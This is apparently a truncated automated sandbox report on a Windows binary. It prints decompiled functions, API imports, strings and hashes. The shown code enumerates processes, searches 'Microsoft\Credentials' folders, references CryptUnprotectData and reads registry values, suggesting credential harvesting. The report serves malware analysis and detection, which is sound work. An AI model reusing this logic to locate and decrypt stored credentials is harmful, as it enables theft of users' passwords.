				 *((intOrPtr*)(_t30 + 0x17c)) = 0;
				 *((intOrPtr*)(_t30 + 0x178)) = 0;
				 *((intOrPtr*)(_t30 + 0x170)) = 0;
				_t23 = LoadIconA( *0x41dbd4, 0x65); // executed
				E00402C8F(_t30, _t23);
				return _t30;
			}

0x0040c427
0x0040c42c
0x0040c432
0x0040c438
0x0040c443
0x0040c449
0x0040c451
0x0040c45f
0x0040c45f
0x0040c453
0x0040c453
0x0040c458
0x0040c458
0x0040c466
0x0040c46c
0x0040c471
0x0040c473
0x0040c475
0x0040c476
0x0040c4a0
0x0040c4a0
0x0040c478
0x0040c478
0x0040c47d
0x0040c483
0x0040c486
0x0040c48c
0x0040c491
0x0040c497
0x0040c497
0x0040c4a2
0x0040c4a8
0x0040c4b0
0x0040c4b3
0x0040c4b9
0x0040c4b9
0x0040c4bf
0x0040c4cf
0x0040c4d5
0x0040c4e2
0x0040c4e8
0x0040c4ee
0x0040c4f4
0x0040c4fa
0x0040c503
0x0040c50d

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040C449
??2@YAPAXI@Z.MSVCRT ref: 0040C46C
DeleteObject.GDI32(?), ref: 0040C4B3
LoadIconA.USER32(00000065), ref: 0040C4FA

Strings

;@, xrefs: 0040C491

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$DeleteIconLoadObject
String ID: ;@
API String ID: 1986663749-2925476404
Opcode ID: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
Opcode Fuzzy Hash: 4dd53dc8d509f152d3d3e7defd5ee1d3aa3759e23b2fb38ffde6a536d33112bb
Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68

Uniqueness

Uniqueness Score: -1.00%

Function 00414DB1, Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A

Part of subcall function 00414DF0: GetModuleHandleA.KERNEL32(00414DE7), ref: 00414DF0
Part of subcall function 00414DF0: GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
Part of subcall function 00414DF0: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
Part of subcall function 00414DF0: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction ID: 043642bf5cdc1de150e3446c738409664b5144c0223cf5edf213a9aa475217cd
Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction Fuzzy Hash: 8621E7311493416FEB218B745C017E6BBD8ABA7374F19469BD044CB283D26D98C693AE

Uniqueness

Uniqueness Score: -1.00%

Function 00414E0D, Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34
GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProcProtectVirtual$HandleModule
String ID:
API String ID: 2152742572-0
Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction ID: 94a9458822a42be4aa48e0704f6d9666272a38e661a699dcd97394ecc6966311
Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction Fuzzy Hash: 72F022602857003CEF3155B41C42AFB9F8CAAE7360F280A4BF014C7283C59C888683BE

Uniqueness

Uniqueness Score: -1.00%

Function 00411560, Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004115A1
K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9

Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
Part of subcall function 004112D9: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336

Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198

Part of subcall function 0041172B: memcpy.MSVCRT ref: 00411758

_mbscpy.MSVCRT ref: 0041165E
CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseEnumProcess_mbscpy$ChangeFileFindHandleModuleModulesNameNotificationOpenProcessesmemcpymemset
String ID:
API String ID: 3551507631-0
Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00411C8F, Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411CB8

Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
Part of subcall function 00406F2D: memcpy.MSVCRT ref: 00406F78

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
memset.MSVCRT ref: 00411CF4
GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Writememcpysprintf
String ID:
API String ID: 3143880245-0
Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404220, Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00404220(void* __eflags, intOrPtr _a4, void* _a8) {
				signed int _v8;
				void* __ecx;
				void* __esi;
				void* _t17;
				void* _t18;
				void* _t19;
				signed int _t20;
				void* _t24;
				void* _t27;
				long _t31;
				void* _t34;

				_v8 = _v8 & 0x00000000;
				_t34 = E004067BA(_a8);
				_a8 = _t34;
				if(_t34 != 0xffffffff) {
					_t31 = GetFileSize(_t34, 0);
					_t5 = _t31 - 0x11; // -17
					if(_t5 <= 0xfffee) {
						_t6 = _t31 + 1; // 0x1
						_t17 = _t6;
						0x413d5c(); // executed
						_t27 = _t17;
						_t24 = _t17;
						_t18 = E00406ED6(_t27, 0, _t34, _t24, _t31); // executed
						if(_t18 != 0) {
							_t19 = E00406B3B();
							_t43 = _t19;
							if(_t19 == 0) {
								_push(_t31);
								_push(_t24);
							} else {
								_push(_t31 + 0xfffffff4);
								_t7 = _t24 + 0xc; // 0xc
							}
							_push(_a4);
							_t20 = E004049E6(_t43); // executed
							_v8 = _t20;
						}
						0x413d56(_t24);
					}
					CloseHandle(_a8);
				}
				return _v8;
			}

0x00404224
0x00404233
0x00404239
0x0040423c
0x00404247
0x00404249
0x00404251
0x00404253
0x00404253
0x00404257
0x0040425c
0x0040425d
0x00404264
0x0040426e
0x00404270
0x00404275
0x00404277
0x00404283
0x00404284
0x00404279
0x0040427c
0x0040427d
0x00404280
0x00404285
0x00404288
0x0040428d
0x0040428d
0x00404291
0x00404296
0x0040429a
0x0040429a
0x004042a7

APIs

Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
??2@YAPAXI@Z.MSVCRT ref: 00404257

Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED

??3@YAXPAX@Z.MSVCRT ref: 00404291
CloseHandle.KERNEL32(?), ref: 0040429A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: File$??2@??3@CloseCreateHandleReadSize
String ID:
API String ID: 1968906679-0
Opcode ID: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
Opcode Fuzzy Hash: f8c6986dee829a369a6d7fc671dad0cd2f3c2bf524c5f015633fded4cebe1fc5
Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8

Uniqueness

Uniqueness Score: -1.00%

Function 004112D9, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$ChangeCloseEnumFileFindModuleModulesNameNotificationOpen
String ID:
API String ID: 1149579341-0
Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D

Uniqueness

Uniqueness Score: -1.00%

Function 004140F2, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 004140FC
??3@YAXPAX@Z.MSVCRT ref: 0041410C
??3@YAXPAX@Z.MSVCRT ref: 0041411C
??3@YAXPAX@Z.MSVCRT ref: 0041412C

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
Opcode Fuzzy Hash: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C

Uniqueness

Uniqueness Score: -1.00%

Function 004086ED, Relevance: 5.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00408715
??2@YAPAXI@Z.MSVCRT ref: 00408733
??2@YAPAXI@Z.MSVCRT ref: 00408751
??2@YAPAXI@Z.MSVCRT ref: 00408761

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
Opcode Fuzzy Hash: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D935, Relevance: 4.5, APIs: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D935(intOrPtr* _a4) {
				long _v8;
				long _v12;
				char _v273;
				void _v275;
				char _v276;
				void* _t21;
				void* _t22;

				_v8 = 0;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				GetWindowsDirectoryA( &_v276, 0x104);
				_v273 = 0;
				GetVolumeInformationA( &_v276, 0, 0,  &_v8,  &_v12, 0, 0, 0); // executed
				_t21 = E0040D794(_a4, 0x80000002, _v8); // executed
				if(_t21 != 0) {
					_t22 = E0040D794(_a4, 0x80000001, _v8); // executed
					return _t22;
				}
				return _t21;
			}

0x0040d950
0x0040d953
0x0040d959
0x0040d969
0x0040d983
0x0040d989
0x0040d99a
0x0040d9a1
0x0040d9ae
0x00000000
0x0040d9ae
0x0040d9b6

APIs

memset.MSVCRT ref: 0040D959
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989

Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925

Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
Part of subcall function 0040D794: atoi.MSVCRT ref: 0040D840
Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8B3
Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8C6
Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
String ID:
API String ID: 2578913611-0
Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406982, Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406982(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						 *__eax =  *__eax + _a8;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						0x413de6(_t13);
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x00406982
0x00406983
0x00406987
0x004069d2
0x00406989
0x0040698a
0x0040698c
0x00406990
0x00406992
0x00406994
0x0040699e
0x004069a6
0x004069a8
0x004069ac
0x004069b6
0x004069bb
0x004069bf
0x004069c4
0x004069ce
0x004069ce

APIs

malloc.MSVCRT ref: 0040699E
memcpy.MSVCRT ref: 004069B6
??3@YAXPAX@Z.MSVCRT ref: 004069BF

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@mallocmemcpy
String ID:
API String ID: 3831604043-0
Opcode ID: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
Opcode Fuzzy Hash: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00410383, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20

_mbscpy.MSVCRT ref: 004103C3

Strings

CryptUnprotectData, xrefs: 004103BD

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Version_mbscpy
String ID: CryptUnprotectData
API String ID: 1856898028-1975210251
Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00406AE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406AE0() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E00406A19( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}

0x00406af2
0x00406afe
0x00406b05

APIs

Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63

CreateFontIndirectA.GDI32(?), ref: 00406AFE

Strings

Arial, xrefs: 00406AEA

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateFontIndirect_mbscpymemset
String ID: Arial
API String ID: 3853255127-493054409
Opcode ID: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
Instruction ID: e76317b4d314f44c8759e74956d0c4c6c36286f6473dc8017c9c1f452a7d8835
Opcode Fuzzy Hash: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
Instruction Fuzzy Hash: 25D0C970E4020C66D600B7A0FD07BC9776C5B40708F504025BA01B50E1EAE4E1188AD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5A4, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040C5A4(void* __edi, void* __eflags) {
				void* __esi;
				signed int _t20;
				intOrPtr _t27;
				intOrPtr _t34;
				void* _t38;
				void* _t41;
				void* _t45;
				void* _t47;
				intOrPtr _t48;

				_t45 = __edi;
				_t34 = 0;
				E00403CB2( *((intOrPtr*)(__edi + 0x390)), __eflags, 0, 0);
				_t20 =  *((intOrPtr*)(__edi + 0x398));
				 *((intOrPtr*)(__edi + 0x108)) = 0;
				if( *((intOrPtr*)(_t20 + 0x30)) <= 0) {
					_t47 = 0x417c88;
				} else {
					if( *((intOrPtr*)(_t20 + 0x1c)) <= 0) {
						_t41 = 0;
						__eflags = 0;
					} else {
						_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t20 + 0xc)))) +  *((intOrPtr*)(_t20 + 0x10));
					}
					_t47 = _t41;
				}
				0x413dce("/stext", _t47);
				if(_t20 != 0) {
					_t48 = E0040C50E(_t20, _t47);
					__eflags = _t48 - _t34;
					if(_t48 <= _t34) {
						goto L15;
					}
					goto L9;
				} else {
					_t48 = 1;
					L9:
					E0040BBF0(_t45, _t34); // executed
					E0040B2F5(_t45);
					_t27 =  *((intOrPtr*)(_t45 + 0x398));
					if( *((intOrPtr*)(_t27 + 0x30)) <= 1) {
						_t38 = 0x417c88;
					} else {
						_t55 =  *((intOrPtr*)(_t27 + 0x1c)) - 1;
						if( *((intOrPtr*)(_t27 + 0x1c)) <= 1) {
							_t38 = 0;
						} else {
							_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc)) + 4)) +  *((intOrPtr*)(_t27 + 0x10));
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x390)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x38c)) + 0x730));
					E0040A8F2( *((intOrPtr*)(_t45 + 0x390)),  *((intOrPtr*)(_t45 + 0x390)), _t45, _t55, _t38, _t48); // executed
					_t34 = 1;
					E0040BDCF(_t45);
					L15:
					return _t34;
				}
			}

0x0040c5a4
0x0040c5ac
0x0040c5b0
0x0040c5b5
0x0040c5bb
0x0040c5c4
0x0040c5db
0x0040c5c6
0x0040c5c9
0x0040c5d5
0x0040c5d5
0x0040c5cb
0x0040c5d0
0x0040c5d0
0x0040c5d7
0x0040c5d7
0x0040c5e6
0x0040c5ef
0x0040c5fb
0x0040c5fd
0x0040c5ff
0x00000000
0x00000000
0x00000000
0x0040c5f1
0x0040c5f3
0x0040c601
0x0040c604
0x0040c60b
0x0040c610
0x0040c61a
0x0040c631
0x0040c61c
0x0040c61c
0x0040c620
0x0040c62d
0x0040c622
0x0040c628
0x0040c628
0x0040c620
0x0040c649
0x0040c656
0x0040c65f
0x0040c660
0x0040c666
0x0040c669
0x0040c669

APIs

_strcmpi.MSVCRT ref: 0040C5E6

Strings

/stext, xrefs: 0040C5E1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi
String ID: /stext
API String ID: 1439213657-3817206916
Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004042AA, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004042AA(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				signed char _v972;
				char _v1296;
				signed int _v1300;
				void* __esi;
				void* _t33;
				char* _t34;
				void* _t38;
				void* _t41;
				intOrPtr _t44;
				void* _t45;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t38 = __ecx;
				_t41 = 0;
				E0040783B( &_v1300, __eflags, _a4);
				if(E00407898( &_v1300) == 0) {
					L11:
					E00407930( &_v1300);
					return _t41;
				} else {
					_t44 = _a8;
					do {
						if((_v972 & 0x00000010) != 0) {
							__eflags = E00407800( &_v1300);
							if(__eflags != 0) {
								E004042AA(_t38, __eflags,  &_v652, _t44 + 1);
							}
							goto L10;
						}
						if(E00406B3B() != 0) {
							L6:
							_t33 = E00404220(_t51, _t38,  &_v652); // executed
							if(_t33 != 0) {
								_t41 = 1;
							}
							goto L10;
						}
						if(_t44 < 1) {
							goto L10;
						}
						_t34 =  &_v928;
						0x413d92(_t34, "credentials", 0xb);
						_t45 = _t45 + 0xc;
						_t51 = _t34;
						if(_t34 != 0) {
							goto L10;
						}
						goto L6;
						L10:
					} while (E00407898( &_v1300) != 0);
					goto L11;
				}
			}

0x004042b3
0x004042c2
0x004042c8
0x004042ce
0x004042da
0x004042dc
0x004042de
0x004042f0
0x0040436c
0x00404372
0x0040437d
0x004042f2
0x004042f2
0x004042f5
0x004042fc
0x00404347
0x00404349
0x00404358
0x00404358
0x00000000
0x00404349
0x00404305
0x00404326
0x0040432e
0x00404335
0x00404339
0x00404339
0x00000000
0x00404335
0x0040430a
0x00000000
0x00000000
0x0040430e
0x0040431a
0x0040431f
0x00404322
0x00404324
0x00000000
0x00000000
0x00000000
0x0040435d
0x00404368
0x00000000
0x004042f5

APIs

Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F

Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
Part of subcall function 00407898: strlen.MSVCRT ref: 00407904

_strnicmp.MSVCRT ref: 0040431A

Strings

credentials, xrefs: 00404314

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$FileFindFirst_strnicmp
String ID: credentials
API String ID: 773473087-4194641934
Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040E675, Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E695

Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1

strrchr.MSVCRT ref: 0040E6B1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CompareFileTimememsetstrrchr
String ID:
API String ID: 4226234548-0
Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404380, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404380(intOrPtr _a4, intOrPtr _a8) {
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				int _t13;
				int _t17;

				_t17 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t16 =  &_v268;
				0x41223f(); // executed
				_t21 = _a8;
				if(_a8 != 0) {
					E0040680E( &_v268);
					E00406EFE(_t16, "Microsoft\Credentials");
					_t13 = E004042AA(_a4, _t21, _t16, 0); // executed
